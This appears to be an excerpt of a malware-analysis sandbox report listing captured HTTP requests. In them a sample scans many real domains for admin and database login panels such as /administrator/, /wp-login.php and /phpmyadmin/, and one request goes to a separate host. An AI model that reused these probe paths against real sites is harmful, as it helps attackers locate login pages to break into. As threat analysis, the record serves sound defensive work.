Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://gco.uk/wp-login.php
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.88; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.132; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.119.144.89; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.88; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.80.36; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.119.144.201; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.88; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.119.144.209; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.132; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://gco.uk/administrator/
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://gco.uk/administrator/
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://gco.uk/wp-login.php
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://gco.uk/administrator/
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://gco.uk/wp-login.php
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://gco.uk/wp-login.php
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://gco.uk/administrator/
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://gco.uk/wp-login.php
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: a5a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /atoz/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: atozrental.cc
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: m7l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: ia.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: m7l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://m7l.com/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ia.euAccept: /Accept-Encoding: deflate, gzipCookie: parking_session=7f46c281-0d45-430a-b10e-fda1cde88190User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ia.eu/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: san.eeAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: onlist.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: gcann.cr.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: gr.2mail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/ HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: san.eeAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://san.ee/administrator/
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: gcann.cr.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: onlist.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: noweco.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
